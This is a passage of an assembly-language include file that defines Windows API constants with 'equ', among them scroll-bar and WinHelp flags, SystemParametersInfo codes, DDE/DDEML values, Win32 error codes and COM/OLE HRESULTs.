SBS_RIGHTALIGN equ 4h
SBS_SIZEBOXTOPLEFTALIGN equ 2h
SBS_SIZEBOXBOTTOMRIGHTALIGN equ 4h
SBS_SIZEBOX equ 8h
SBS_SIZEGRIP equ 10h
SBM_SETPOS equ 0E0h
SBM_GETPOS equ 0E1h
SBM_SETRANGE equ 0E2h
SBM_SETRANGEREDRAW equ 0E6h
SBM_GETRANGE equ 0E3h
SBM_ENABLE_ARROWS equ 0E4h
MDIS_ALLCHILDSTYLES equ 1h
MDITILE_VERTICAL equ 0h
MDITILE_HORIZONTAL equ 1h
MDITILE_SKIPDISABLED equ 2h
HELP_CONTEXT equ 1h
HELP_QUIT equ 2h
HELP_INDEX equ 3h
HELP_CONTENTS equ 3h
HELP_HELPONHELP equ 4h
HELP_SETINDEX equ 5h
HELP_SETCONTENTS equ 5h
HELP_CONTEXTPOPUP equ 8h
HELP_FORCEFILE equ 9h
HELP_KEY equ 101h
HELP_COMMAND equ 102h
HELP_PARTIALKEY equ 105h
HELP_MULTIKEY equ 201h
HELP_SETWINPOS equ 203h
HELP_CONTEXTMENU equ 000Ah
HELP_FINDER equ 000Bh
HELP_WM_HELP equ 000Ch
HELP_SETPOPUP_POS equ 000Dh
HELP_TCARD equ 8000h
HELP_TCARD_DATA equ 0010h
HELP_TCARD_OTHER_CALLER equ 0011h
IDH_NO_HELP equ 28440
IDH_MISSING_CONTEXT equ 28441
IDH_GENERIC_HELP_BUTTON equ 28442
IDH_OK equ 28443
IDH_CANCEL equ 28444
IDH_HELP equ 28445
SPI_GETBEEP equ 1
SPI_SETBEEP equ 2
SPI_GETMOUSE equ 3
SPI_SETMOUSE equ 4
SPI_GETBORDER equ 5
SPI_SETBORDER equ 6
SPI_GETKEYBOARDSPEED equ 10
SPI_SETKEYBOARDSPEED equ 11
SPI_LANGDRIVER equ 12
SPI_ICONHORIZONTALSPACING equ 13
SPI_GETSCREENSAVETIMEOUT equ 14
SPI_SETSCREENSAVETIMEOUT equ 15
SPI_GETSCREENSAVEACTIVE equ 16
SPI_SETSCREENSAVEACTIVE equ 17
SPI_GETGRIDGRANULARITY equ 18
SPI_SETGRIDGRANULARITY equ 19
SPI_SETDESKWALLPAPER equ 20
SPI_SETDESKPATTERN equ 21
SPI_GETKEYBOARDDELAY equ 22
SPI_SETKEYBOARDDELAY equ 23
SPI_ICONVERTICALSPACING equ 24
SPI_GETICONTITLEWRAP equ 25
SPI_SETICONTITLEWRAP equ 26
SPI_GETMENUDROPALIGNMENT equ 27
SPI_SETMENUDROPALIGNMENT equ 28
SPI_SETDOUBLECLKWIDTH equ 29
SPI_SETDOUBLECLKHEIGHT equ 30
SPI_GETICONTITLELOGFONT equ 31
SPI_SETDOUBLECLICKTIME equ 32
SPI_SETMOUSEBUTTONSWAP equ 33
SPI_SETICONTITLELOGFONT equ 34
SPI_GETFASTTASKSWITCH equ 35
SPI_SETFASTTASKSWITCH equ 36
SPI_SETDRAGFULLWINDOWS equ 37
SPI_GETDRAGFULLWINDOWS equ 38
SPI_GETNONCLIENTMETRICS equ 41
SPI_SETNONCLIENTMETRICS equ 42
SPI_GETMINIMIZEDMETRICS equ 43
SPI_SETMINIMIZEDMETRICS equ 44
SPI_GETICONMETRICS equ 45
SPI_SETICONMETRICS equ 46
SPI_SETWORKAREA equ 47
SPI_GETWORKAREA equ 48
SPI_SETPENWINDOWS equ 49
SPI_GETFILTERKEYS equ 50
SPI_SETFILTERKEYS equ 51
SPI_GETTOGGLEKEYS equ 52
SPI_SETTOGGLEKEYS equ 53
SPI_GETMOUSEKEYS equ 54
SPI_SETMOUSEKEYS equ 55
SPI_GETSHOWSOUNDS equ 56
SPI_SETSHOWSOUNDS equ 57
SPI_GETSTICKYKEYS equ 58
SPI_SETSTICKYKEYS equ 59
SPI_GETACCESSTIMEOUT equ 60
SPI_SETACCESSTIMEOUT equ 61
SPI_GETSERIALKEYS equ 62
SPI_SETSERIALKEYS equ 63
SPI_GETSOUNDSENTRY equ 64
SPI_SETSOUNDSENTRY equ 65
SPI_GETHIGHCONTRAST equ 66
SPI_SETHIGHCONTRAST equ 67
SPI_GETKEYBOARDPREF equ 68
SPI_SETKEYBOARDPREF equ 69
SPI_GETSCREENREADER equ 70
SPI_SETSCREENREADER equ 71
SPI_GETANIMATION equ 72
SPI_SETANIMATION equ 73
SPI_GETFONTSMOOTHING equ 74
SPI_SETFONTSMOOTHING equ 75
SPI_SETDRAGWIDTH equ 76
SPI_SETDRAGHEIGHT equ 77
SPI_SETHANDHELD equ 78
SPI_GETLOWPOWERTIMEOUT equ 79
SPI_GETPOWEROFFTIMEOUT equ 80
SPI_SETLOWPOWERTIMEOUT equ 81
SPI_SETPOWEROFFTIMEOUT equ 82
SPI_GETLOWPOWERACTIVE equ 83
SPI_GETPOWEROFFACTIVE equ 84
SPI_SETLOWPOWERACTIVE equ 85
SPI_SETPOWEROFFACTIVE equ 86
SPI_SETCURSORS equ 87
SPI_SETICONS equ 88
SPI_GETDEFAULTINPUTLANG equ 89
SPI_SETDEFAULTINPUTLANG equ 90
SPI_SETLANGTOGGLE equ 91
SPI_GETWINDOWSEXTENSION equ 92
SPI_SETMOUSETRAILS equ 93
SPI_GETMOUSETRAILS equ 94
SPI_SCREENSAVERRUNNING equ 97
SPIF_UPDATEINIFILE equ 1h
SPIF_SENDWININICHANGE equ 2h
WM_DDE_FIRST equ 3E0h
WM_DDE_INITIATE equ WM_DDE_FIRST
WM_DDE_TERMINATE equ WM_DDE_FIRST+1
WM_DDE_ADVISE equ WM_DDE_FIRST+2
WM_DDE_UNADVISE equ WM_DDE_FIRST+3
WM_DDE_ACK equ WM_DDE_FIRST+4
WM_DDE_DATA equ WM_DDE_FIRST+5
WM_DDE_REQUEST equ WM_DDE_FIRST+6
WM_DDE_POKE equ WM_DDE_FIRST+7
WM_DDE_EXECUTE equ WM_DDE_FIRST+8
WM_DDE_LAST equ WM_DDE_FIRST+8
XST_NULL equ 0
XST_INCOMPLETE equ 1
XST_CONNECTED equ 2
XST_INIT1 equ 3
XST_INIT2 equ 4
XST_REQSENT equ 5
XST_DATARCVD equ 6
XST_POKESENT equ 7
XST_POKEACKRCVD equ 8
XST_EXECSENT equ 9
XST_EXECACKRCVD equ 10
XST_ADVSENT equ 11
XST_UNADVSENT equ 12
XST_ADVACKRCVD equ 13
XST_UNADVACKRCVD equ 14
XST_ADVDATASENT equ 15
XST_ADVDATAACKRCVD equ 16
CADV_LATEACK equ 0FFFFh
ST_CONNECTED equ 1h
ST_ADVISE equ 2h
ST_ISLOCAL equ 4h
ST_BLOCKED equ 8h
ST_CLIENT equ 10h
ST_TERMINATED equ 20h
ST_INLIST equ 40h
ST_BLOCKNEXT equ 80h
ST_ISSELF equ 100h
DDE_FACK equ 8000h
DDE_FBUSY equ 4000h
DDE_FDEFERUPD equ 4000h
DDE_FACKREQ equ 8000h
DDE_FRELEASE equ 2000h
DDE_FREQUESTED equ 1000h
DDE_FAPPSTATUS equ 0FFh
DDE_FNOTPROCESSED equ 0h
DDE_FACKRESERVED equ (-1-DDE_FACK)|DDE_FBUSY|DDE_FAPPSTATUS
DDE_FADVRESERVED equ (-1-DDE_FACKREQ)|DDE_FDEFERUPD
DDE_FDATRESERVED equ (-1-DDE_FACKREQ)|DDE_FRELEASE|DDE_FREQUESTED
DDE_FPOKRESERVED equ (-1-DDE_FRELEASE)
CP_WINANSI equ 1004
CP_WINUNICODE equ 1200
XTYPF_NOBLOCK equ 2h
XTYPF_NODATA equ 4h
XTYPF_ACKREQ equ 8h
XCLASS_MASK equ 0FC00h
XCLASS_BOOL equ 1000h
XCLASS_DATA equ 2000h
XCLASS_FLAGS equ 4000h
XCLASS_NOTIFICATION equ 8000h
XTYP_ERROR equ 0h|XCLASS_NOTIFICATION|XTYPF_NOBLOCK
XTYP_ADVDATA equ 10h|XCLASS_FLAGS
XTYP_ADVREQ equ 20h|XCLASS_DATA|XTYPF_NOBLOCK
XTYP_ADVSTART equ 30h|XCLASS_BOOL
XTYP_ADVSTOP equ 40h|XCLASS_NOTIFICATION
XTYP_EXECUTE equ 50h|XCLASS_FLAGS
XTYP_CONNECT equ 60h|XCLASS_BOOL|XTYPF_NOBLOCK
XTYP_CONNECT_CONFIRM equ 70h|XCLASS_NOTIFICATION|XTYPF_NOBLOCK
XTYP_XACT_COMPLETE equ 80h|XCLASS_NOTIFICATION
XTYP_POKE equ 90h|XCLASS_FLAGS
XTYP_REGISTER equ 0A0h|XCLASS_NOTIFICATION|XTYPF_NOBLOCK
XTYP_REQUEST equ 0B0h|XCLASS_DATA
XTYP_DISCONNECT equ 0C0h|XCLASS_NOTIFICATION|XTYPF_NOBLOCK
XTYP_UNREGISTER equ 0D0h|XCLASS_NOTIFICATION|XTYPF_NOBLOCK
XTYP_WILDCONNECT equ 0E0h|XCLASS_DATA|XTYPF_NOBLOCK
XTYP_MASK equ 0F0h
XTYP_SHIFT equ 4
TIMEOUT_ASYNC equ 0FFFFh
QID_SYNC equ 0FFFFh
CBR_BLOCK equ 0FFFFh
CBF_FAIL_SELFCONNECTIONS equ 1000h
CBF_FAIL_CONNECTIONS equ 2000h
CBF_FAIL_ADVISES equ 4000h
CBF_FAIL_EXECUTES equ 8000h
CBF_FAIL_POKES equ 10000h
CBF_FAIL_REQUESTS equ 20000h
CBF_FAIL_ALLSVRXACTIONS equ 3F000h
CBF_SKIP_CONNECT_CONFIRMS equ 40000h
CBF_SKIP_REGISTRATIONS equ 80000h
CBF_SKIP_UNREGISTRATIONS equ 100000h
CBF_SKIP_DISCONNECTS equ 200000h
CBF_SKIP_ALLNOTIFICATIONS equ 3C0000h
APPCMD_CLIENTONLY equ 10h
APPCMD_FILTERINITS equ 20h
APPCMD_MASK equ 0FF0h
APPCLASS_STANDARD equ 0h
APPCLASS_MASK equ 0Fh
EC_ENABLEALL equ 0
EC_ENABLEONE equ ST_BLOCKNEXT
EC_DISABLE equ ST_BLOCKED
EC_QUERYWAITING equ 2
DNS_REGISTER equ 1h
DNS_UNREGISTER equ 2h
DNS_FILTERON equ 4h
DNS_FILTEROFF equ 8h
HDATA_APPOWNED equ 1h
DMLERR_NO_ERROR equ 0
DMLERR_FIRST equ 4000h
DMLERR_ADVACKTIMEOUT equ 4000h
DMLERR_BUSY equ 4001h
DMLERR_DATAACKTIMEOUT equ 4002h
DMLERR_DLL_NOT_INITIALIZED equ 4003h
DMLERR_DLL_USAGE equ 4004h
DMLERR_EXECACKTIMEOUT equ 4005h
DMLERR_INVALIDPARAMETER equ 4006h
DMLERR_LOW_MEMORY equ 4007h
DMLERR_MEMORY_ERROR equ 4008h
DMLERR_NOTPROCESSED equ 4009h
DMLERR_NO_CONV_ESTABLISHED equ 400Ah
DMLERR_POKEACKTIMEOUT equ 400Bh
DMLERR_POSTMSG_FAILED equ 400Ch
DMLERR_REENTRANCY equ 400Dh
DMLERR_SERVER_DIED equ 400Eh
DMLERR_SYS_ERROR equ 400Fh
DMLERR_UNADVACKTIMEOUT equ 4010h
DMLERR_UNFOUND_QUEUE_ID equ 4011h
DMLERR_LAST equ 4011h
MH_CREATE equ 1
MH_KEEP equ 2
MH_DELETE equ 3
MH_CLEANUP equ 4
MAX_MONITORS equ 4
APPCLASS_MONITOR equ 1h
XTYP_MONITOR equ 0F0h|XCLASS_NOTIFICATION|XTYPF_NOBLOCK
MF_HSZ_INFO equ 1000000h
MF_SENDMSGS equ 2000000h
MF_POSTMSGS equ 4000000h
MF_CALLBACKS equ 8000000h
MF_ERRORS equ 10000000h
MF_LINKS equ 20000000h
MF_CONV equ 40000000h
MF_MASK equ 0FF000000h
NO_ERROR equ 0
ERROR_SUCCESS equ 0
ERROR_INVALID_FUNCTION equ 1
ERROR_FILE_NOT_FOUND equ 2
ERROR_PATH_NOT_FOUND equ 3
ERROR_TOO_MANY_OPEN_FILES equ 4
ERROR_ACCESS_DENIED equ 5
ERROR_INVALID_HANDLE equ 6
ERROR_ARENA_TRASHED equ 7
ERROR_NOT_ENOUGH_MEMORY equ 8
ERROR_INVALID_BLOCK equ 9
ERROR_BAD_ENVIRONMENT equ 10
ERROR_BAD_FORMAT equ 11
ERROR_INVALID_ACCESS equ 12
ERROR_INVALID_DATA equ 13
ERROR_OUTOFMEMORY equ 14
ERROR_INVALID_DRIVE equ 15
ERROR_CURRENT_DIRECTORY equ 16
ERROR_NOT_SAME_DEVICE equ 17
ERROR_NO_MORE_FILES equ 18
ERROR_WRITE_PROTECT equ 19
ERROR_BAD_UNIT equ 20
ERROR_NOT_READY equ 21
ERROR_BAD_COMMAND equ 22
ERROR_CRC equ 23
ERROR_BAD_LENGTH equ 24
ERROR_SEEK equ 25
ERROR_NOT_DOS_DISK equ 26
ERROR_SECTOR_NOT_FOUND equ 27
ERROR_OUT_OF_PAPER equ 28
ERROR_WRITE_FAULT equ 29
ERROR_READ_FAULT equ 30
ERROR_GEN_FAILURE equ 31
ERROR_SHARING_VIOLATION equ 32
ERROR_LOCK_VIOLATION equ 33
ERROR_WRONG_DISK equ 34
ERROR_SHARING_BUFFER_EXCEEDED equ 36
ERROR_HANDLE_EOF equ 38
ERROR_HANDLE_DISK_FULL equ 39
ERROR_NOT_SUPPORTED equ 50
ERROR_REM_NOT_LIST equ 51
ERROR_DUP_NAME equ 52
ERROR_BAD_NETPATH equ 53
ERROR_NETWORK_BUSY equ 54
ERROR_DEV_NOT_EXIST equ 55
ERROR_TOO_MANY_CMDS equ 56
ERROR_ADAP_HDW_ERR equ 57
ERROR_BAD_NET_RESP equ 58
ERROR_UNEXP_NET_ERR equ 59
ERROR_BAD_REM_ADAP equ 60
ERROR_PRINTQ_FULL equ 61
ERROR_NO_SPOOL_SPACE equ 62
ERROR_PRINT_CANCELLED equ 63
ERROR_NETNAME_DELETED equ 64
ERROR_NETWORK_ACCESS_DENIED equ 65
ERROR_BAD_DEV_TYPE equ 66
ERROR_BAD_NET_NAME equ 67
ERROR_TOO_MANY_NAMES equ 68
ERROR_TOO_MANY_SESS equ 69
ERROR_SHARING_PAUSED equ 70
ERROR_REQ_NOT_ACCEP equ 71
ERROR_REDIR_PAUSED equ 72
ERROR_FILE_EXISTS equ 80
ERROR_CANNOT_MAKE equ 82
ERROR_FAIL_I24 equ 83
ERROR_OUT_OF_STRUCTURES equ 84
ERROR_ALREADY_ASSIGNED equ 85
ERROR_INVALID_PASSWORD equ 86
ERROR_INVALID_PARAMETER equ 87
ERROR_NET_WRITE_FAULT equ 88
ERROR_NO_PROC_SLOTS equ 89
ERROR_TOO_MANY_SEMAPHORES equ 100
ERROR_EXCL_SEM_ALREADY_OWNED equ 101
ERROR_SEM_IS_SET equ 102
ERROR_TOO_MANY_SEM_REQUESTS equ 103
ERROR_INVALID_AT_INTERRUPT_TIME equ 104
ERROR_SEM_OWNER_DIED equ 105
ERROR_SEM_USER_LIMIT equ 106
ERROR_DISK_CHANGE equ 107
ERROR_DRIVE_LOCKED equ 108
ERROR_BROKEN_PIPE equ 109
ERROR_OPEN_FAILED equ 110
ERROR_BUFFER_OVERFLOW equ 111
ERROR_DISK_FULL equ 112
ERROR_NO_MORE_SEARCH_HANDLES equ 113
ERROR_INVALID_TARGET_HANDLE equ 114
ERROR_INVALID_CATEGORY equ 117
ERROR_INVALID_VERIFY_SWITCH equ 118
ERROR_BAD_DRIVER_LEVEL equ 119
ERROR_CALL_NOT_IMPLEMENTED equ 120
ERROR_SEM_TIMEOUT equ 121
ERROR_INSUFFICIENT_BUFFER equ 122
ERROR_INVALID_NAME equ 123
ERROR_INVALID_LEVEL equ 124
ERROR_NO_VOLUME_LABEL equ 125
ERROR_MOD_NOT_FOUND equ 126
ERROR_PROC_NOT_FOUND equ 127
ERROR_WAIT_NO_CHILDREN equ 128
ERROR_CHILD_NOT_COMPLETE equ 129
ERROR_DIRECT_ACCESS_HANDLE equ 130
ERROR_NEGATIVE_SEEK equ 131
ERROR_SEEK_ON_DEVICE equ 132
ERROR_IS_JOIN_TARGET equ 133
ERROR_IS_JOINED equ 134
ERROR_IS_SUBSTED equ 135
ERROR_NOT_JOINED equ 136
ERROR_NOT_SUBSTED equ 137
ERROR_JOIN_TO_JOIN equ 138
ERROR_SUBST_TO_SUBST equ 139
ERROR_JOIN_TO_SUBST equ 140
ERROR_SUBST_TO_JOIN equ 141
ERROR_BUSY_DRIVE equ 142
ERROR_SAME_DRIVE equ 143
ERROR_DIR_NOT_ROOT equ 144
ERROR_DIR_NOT_EMPTY equ 145
ERROR_IS_SUBST_PATH equ 146
ERROR_IS_JOIN_PATH equ 147
ERROR_PATH_BUSY equ 148
ERROR_IS_SUBST_TARGET equ 149
ERROR_SYSTEM_TRACE equ 150
ERROR_INVALID_EVENT_COUNT equ 151
ERROR_TOO_MANY_MUXWAITERS equ 152
ERROR_INVALID_LIST_FORMAT equ 153
ERROR_LABEL_TOO_LONG equ 154
ERROR_TOO_MANY_TCBS equ 155
ERROR_SIGNAL_REFUSED equ 156
ERROR_DISCARDED equ 157
ERROR_NOT_LOCKED equ 158
ERROR_BAD_THREADID_ADDR equ 159
ERROR_BAD_ARGUMENTS equ 160
ERROR_BAD_PATHNAME equ 161
ERROR_SIGNAL_PENDING equ 162
ERROR_MAX_THRDS_REACHED equ 164
ERROR_LOCK_FAILED equ 167
ERROR_BUSY equ 170
ERROR_CANCEL_VIOLATION equ 173
ERROR_ATOMIC_LOCKS_NOT_SUPPORTED equ 174
ERROR_INVALID_SEGMENT_NUMBER equ 180
ERROR_INVALID_ORDINAL equ 182
ERROR_ALREADY_EXISTS equ 183
ERROR_INVALID_FLAG_NUMBER equ 186
ERROR_SEM_NOT_FOUND equ 187
ERROR_INVALID_STARTING_CODESEG equ 188
ERROR_INVALID_STACKSEG equ 189
ERROR_INVALID_MODULETYPE equ 190
ERROR_INVALID_EXE_SIGNATURE equ 191
ERROR_EXE_MARKED_INVALID equ 192
ERROR_BAD_EXE_FORMAT equ 193
ERROR_ITERATED_DATA_EXCEEDS_64k equ 194
ERROR_INVALID_MINALLOCSIZE equ 195
ERROR_DYNLINK_FROM_INVALID_RING equ 196
ERROR_IOPL_NOT_ENABLED equ 197
ERROR_INVALID_SEGDPL equ 198
ERROR_AUTODATASEG_EXCEEDS_64k equ 199
ERROR_RING2SEG_MUST_BE_MOVABLE equ 200
ERROR_RELOC_CHAIN_XEEDS_SEGLIM equ 201
ERROR_INFLOOP_IN_RELOC_CHAIN equ 202
ERROR_ENVVAR_NOT_FOUND equ 203
ERROR_NO_SIGNAL_SENT equ 205
ERROR_FILENAME_EXCED_RANGE equ 206
ERROR_RING2_STACK_IN_USE equ 207
ERROR_META_EXPANSION_TOO_LONG equ 208
ERROR_INVALID_SIGNAL_NUMBER equ 209
ERROR_THREAD_1_INACTIVE equ 210
ERROR_LOCKED equ 212
ERROR_TOO_MANY_MODULES equ 214
ERROR_NESTING_NOT_ALLOWED equ 215
ERROR_BAD_PIPE equ 230
ERROR_PIPE_BUSY equ 231
ERROR_NO_DATA equ 232
ERROR_PIPE_NOT_CONNECTED equ 233
ERROR_MORE_DATA equ 234
ERROR_VC_DISCONNECTED equ 240
ERROR_INVALID_EA_NAME equ 254
ERROR_EA_LIST_INCONSISTENT equ 255
ERROR_NO_MORE_ITEMS equ 259
ERROR_CANNOT_COPY equ 266
ERROR_DIRECTORY equ 267
ERROR_EAS_DIDNT_FIT equ 275
ERROR_EA_FILE_CORRUPT equ 276
ERROR_EA_TABLE_FULL equ 277
ERROR_INVALID_EA_HANDLE equ 278
ERROR_EAS_NOT_SUPPORTED equ 282
ERROR_NOT_OWNER equ 288
ERROR_TOO_MANY_POSTS equ 298
ERROR_MR_MID_NOT_FOUND equ 317
ERROR_INVALID_ADDRESS equ 487
ERROR_ARITHMETIC_OVERFLOW equ 534
ERROR_PIPE_CONNECTED equ 535
ERROR_PIPE_LISTENING equ 536
ERROR_EA_ACCESS_DENIED equ 994
ERROR_OPERATION_ABORTED equ 995
ERROR_IO_INCOMPLETE equ 996
ERROR_IO_PENDING equ 997
ERROR_NOACCESS equ 998
ERROR_SWAPERROR equ 999
ERROR_STACK_OVERFLOW equ 1001
ERROR_INVALID_MESSAGE equ 1002
ERROR_CAN_NOT_COMPLETE equ 1003
ERROR_INVALID_FLAGS equ 1004
ERROR_UNRECOGNIZED_VOLUME equ 1005
ERROR_FILE_INVALID equ 1006
ERROR_FULLSCREEN_MODE equ 1007
ERROR_NO_TOKEN equ 1008
ERROR_BADDB equ 1009
ERROR_BADKEY equ 1010
ERROR_CANTOPEN equ 1011
ERROR_CANTREAD equ 1012
ERROR_CANTWRITE equ 1013
ERROR_REGISTRY_RECOVERED equ 1014
ERROR_REGISTRY_CORRUPT equ 1015
ERROR_REGISTRY_IO_FAILED equ 1016
ERROR_NOT_REGISTRY_FILE equ 1017
ERROR_KEY_DELETED equ 1018
ERROR_NO_LOG_SPACE equ 1019
ERROR_KEY_HAS_CHILDREN equ 1020
ERROR_CHILD_MUST_BE_VOLATILE equ 1021
ERROR_NOTIFY_ENUM_DIR equ 1022
ERROR_DEPENDENT_SERVICES_RUNNING equ 1051
ERROR_INVALID_SERVICE_CONTROL equ 1052
ERROR_SERVICE_REQUEST_TIMEOUT equ 1053
ERROR_SERVICE_NO_THREAD equ 1054
ERROR_SERVICE_DATABASE_LOCKED equ 1055
ERROR_SERVICE_ALREADY_RUNNING equ 1056
ERROR_INVALID_SERVICE_ACCOUNT equ 1057
ERROR_SERVICE_DISABLED equ 1058
ERROR_CIRCULAR_DEPENDENCY equ 1059
ERROR_SERVICE_DOES_NOT_EXIST equ 1060
ERROR_SERVICE_CANNOT_ACCEPT_CTRL equ 1061
ERROR_SERVICE_NOT_ACTIVE equ 1062
ERROR_FAILED_SERVICE_CONTROLLER_CONNECT equ 1063
ERROR_EXCEPTION_IN_SERVICE equ 1064
ERROR_DATABASE_DOES_NOT_EXIST equ 1065
ERROR_SERVICE_SPECIFIC_ERROR equ 1066
ERROR_PROCESS_ABORTED equ 1067
ERROR_SERVICE_DEPENDENCY_FAIL equ 1068
ERROR_SERVICE_LOGON_FAILED equ 1069
ERROR_SERVICE_START_HANG equ 1070
ERROR_INVALID_SERVICE_LOCK equ 1071
ERROR_SERVICE_MARKED_FOR_DELETE equ 1072
ERROR_SERVICE_EXISTS equ 1073
ERROR_ALREADY_RUNNING_LKG equ 1074
ERROR_SERVICE_DEPENDENCY_DELETED equ 1075
ERROR_BOOT_ALREADY_ACCEPTED equ 1076
ERROR_SERVICE_NEVER_STARTED equ 1077
ERROR_DUPLICATE_SERVICE_NAME equ 1078
ERROR_END_OF_MEDIA equ 1100
ERROR_FILEMARK_DETECTED equ 1101
ERROR_BEGINNING_OF_MEDIA equ 1102
ERROR_SETMARK_DETECTED equ 1103
ERROR_NO_DATA_DETECTED equ 1104
ERROR_PARTITION_FAILURE equ 1105
ERROR_INVALID_BLOCK_LENGTH equ 1106
ERROR_DEVICE_NOT_PARTITIONED equ 1107
ERROR_UNABLE_TO_LOCK_MEDIA equ 1108
ERROR_UNABLE_TO_UNLOAD_MEDIA equ 1109
ERROR_MEDIA_CHANGED equ 1110
ERROR_BUS_RESET equ 1111
ERROR_NO_MEDIA_IN_DRIVE equ 1112
ERROR_NO_UNICODE_TRANSLATION equ 1113
ERROR_DLL_INIT_FAILED equ 1114
ERROR_SHUTDOWN_IN_PROGRESS equ 1115
ERROR_NO_SHUTDOWN_IN_PROGRESS equ 1116
ERROR_IO_DEVICE equ 1117
ERROR_SERIAL_NO_DEVICE equ 1118
ERROR_IRQ_BUSY equ 1119
ERROR_MORE_WRITES equ 1120
ERROR_COUNTER_TIMEOUT equ 1121
ERROR_FLOPPY_ID_MARK_NOT_FOUND equ 1122
ERROR_FLOPPY_WRONG_CYLINDER equ 1123
ERROR_FLOPPY_UNKNOWN_ERROR equ 1124
ERROR_FLOPPY_BAD_REGISTERS equ 1125
ERROR_DISK_RECALIBRATE_FAILED equ 1126
ERROR_DISK_OPERATION_FAILED equ 1127
ERROR_DISK_RESET_FAILED equ 1128
ERROR_EOM_OVERFLOW equ 1129
ERROR_NOT_ENOUGH_SERVER_MEMORY equ 1130
ERROR_POSSIBLE_DEADLOCK equ 1131
ERROR_MAPPED_ALIGNMENT equ 1132
ERROR_INVALID_PIXEL_FORMAT equ 2000
ERROR_BAD_DRIVER equ 2001
ERROR_INVALID_WINDOW_STYLE equ 2002
ERROR_METAFILE_NOT_SUPPORTED equ 2003
ERROR_TRANSFORM_NOT_SUPPORTED equ 2004
ERROR_CLIPPING_NOT_SUPPORTED equ 2005
ERROR_UNKNOWN_PRINT_MONITOR equ 3000
ERROR_PRINTER_DRIVER_IN_USE equ 3001
ERROR_SPOOL_FILE_NOT_FOUND equ 3002
ERROR_SPL_NO_STARTDOC equ 3003
ERROR_SPL_NO_ADDJOB equ 3004
ERROR_PRINT_PROCESSOR_ALREADY_INSTALLED equ 3005
ERROR_PRINT_MONITOR_ALREADY_INSTALLED equ 3006
ERROR_WINS_INTERNAL equ 4000
ERROR_CAN_NOT_DEL_LOCAL_WINS equ 4001
ERROR_STATIC_INIT equ 4002
ERROR_INC_BACKUP equ 4003
ERROR_FULL_BACKUP equ 4004
ERROR_REC_NON_EXISTENT equ 4005
ERROR_RPL_NOT_ALLOWED equ 4006
SEVERITY_SUCCESS equ 0
SEVERITY_ERROR equ 1
FACILITY_NT_BIT equ 10000000h
NOERROR equ 0
E_UNEXPECTED equ 8000FFFFh
E_NOTIMPL equ 80004001h
E_OUTOFMEMORY equ 8007000Eh
E_INVALIDARG equ 80070057h
E_NOINTERFACE equ 80004002h
E_POINTER equ 80004003h
E_HANDLE equ 80070006h
E_ABORT equ 80004004h
E_FAIL equ 80004005h
E_ACCESSDENIED equ 80070005h
CO_E_INIT_TLS equ 80004006h
CO_E_INIT_SHARED_ALLOCATOR equ 80004007h
CO_E_INIT_MEMORY_ALLOCATOR equ 80004008h
CO_E_INIT_CLASS_CACHE equ 80004009h
CO_E_INIT_RPC_CHANNEL equ 8000400Ah
CO_E_INIT_TLS_SET_CHANNEL_CONTROL equ 8000400Bh
CO_E_INIT_TLS_CHANNEL_CONTROL equ 8000400Ch
CO_E_INIT_UNACCEPTED_USER_ALLOCATOR equ 8000400Dh
CO_E_INIT_SCM_MUTEX_EXISTS equ 8000400Eh
CO_E_INIT_SCM_FILE_MAPPING_EXISTS equ 8000400Fh
CO_E_INIT_SCM_MAP_VIEW_OF_FILE equ 80004010h
CO_E_INIT_SCM_EXEC_FAILURE equ 80004011h
CO_E_INIT_ONLY_SINGLE_THREADED equ 80004012h
S_OK equ 0h
S_FALSE equ 1h
OLE_E_FIRST equ 80040000h
OLE_E_LAST equ 800400FFh
OLE_S_FIRST equ 40000h
OLE_S_LAST equ 400FFh
OLE_E_OLEVERB equ 80040000h
OLE_E_ADVF equ 80040001h
OLE_E_ENUM_NOMORE equ 80040002h
OLE_E_ADVISENOTSUPPORTED equ 80040003h
OLE_E_NOCONNECTION equ 80040004h
OLE_E_NOTRUNNING equ 80040005h
OLE_E_NOCACHE equ 80040006h
OLE_E_BLANK equ 80040007h
OLE_E_CLASSDIFF equ 80040008h
OLE_E_CANT_GETMONIKER equ 80040009h
OLE_E_CANT_BINDTOSOURCE equ 8004000Ah
OLE_E_STATIC equ 8004000Bh
OLE_E_PROMPTSAVECANCELLED equ 8004000Ch
OLE_E_INVALIDRECT equ 8004000Dh
OLE_E_WRONGCOMPOBJ equ 8004000Eh
OLE_E_INVALIDHWND equ 8004000Fh
OLE_E_NOT_INPLACEACTIVE equ 80040010h
OLE_E_CANTCONVERT equ 80040011h
OLE_E_NOSTORAGE equ 80040012h
DV_E_FORMATETC equ 80040064h
DV_E_DVTARGETDEVICE equ 80040065h
DV_E_STGMEDIUM equ 80040066h
DV_E_STATDATA equ 80040067h
DV_E_LINDEX equ 80040068h
DV_E_TYMED equ 80040069h
DV_E_CLIPFORMAT equ 8004006Ah
DV_E_DVASPECT equ 8004006Bh
DV_E_DVTARGETDEVICE_SIZE equ 8004006Ch
DV_E_NOIVIEWOBJECT equ 8004006Dh
DRAGDROP_E_FIRST equ 80040100h
DRAGDROP_E_LAST equ 8004010Fh
DRAGDROP_S_FIRST equ 40100h
DRAGDROP_S_LAST equ 4010Fh
DRAGDROP_E_NOTREGISTERED equ 80040100h
DRAGDROP_E_ALREADYREGISTERED equ 80040101h
DRAGDROP_E_INVALIDHWND equ 80040102h
CLASSFACTORY_E_FIRST equ 80040110h
CLASSFACTORY_E_LAST equ 8004011Fh
CLASSFACTORY_S_FIRST equ 40110h
CLASSFACTORY_S_LAST equ 4011Fh
CLASS_E_NOAGGREGATION equ 80040110h
CLASS_E_CLASSNOTAVAILABLE equ 80040111h
MARSHAL_E_FIRST equ 80040120h
MARSHAL_E_LAST equ 8004012Fh
MARSHAL_S_FIRST equ 40120h
MARSHAL_S_LAST equ 4012Fh
DATA_E_FIRST equ 80040130h
DATA_E_LAST equ 8004013Fh
DATA_S_FIRST equ 40130h
DATA_S_LAST equ 4013Fh
VIEW_E_FIRST equ 80040140h
VIEW_E_LAST equ 8004014Fh
VIEW_S_FIRST equ 40140h
VIEW_S_LAST equ 4014Fh
VIEW_E_DRAW equ 80040140h
REGDB_E_FIRST equ 80040150h
REGDB_E_LAST equ 8004015Fh
REGDB_S_FIRST equ 40150h
REGDB_S_LAST equ 4015Fh
REGDB_E_READREGDB equ 80040150h
REGDB_E_WRITEREGDB equ 80040151h
REGDB_E_KEYMISSING equ 80040152h
REGDB_E_INVALIDVALUE equ 80040153h
REGDB_E_CLASSNOTREG equ 80040154h
REGDB_E_IIDNOTREG equ 80040155h
CACHE_E_FIRST equ 80040170h
CACHE_E_LAST equ 8004017Fh
CACHE_S_FIRST equ 40170h
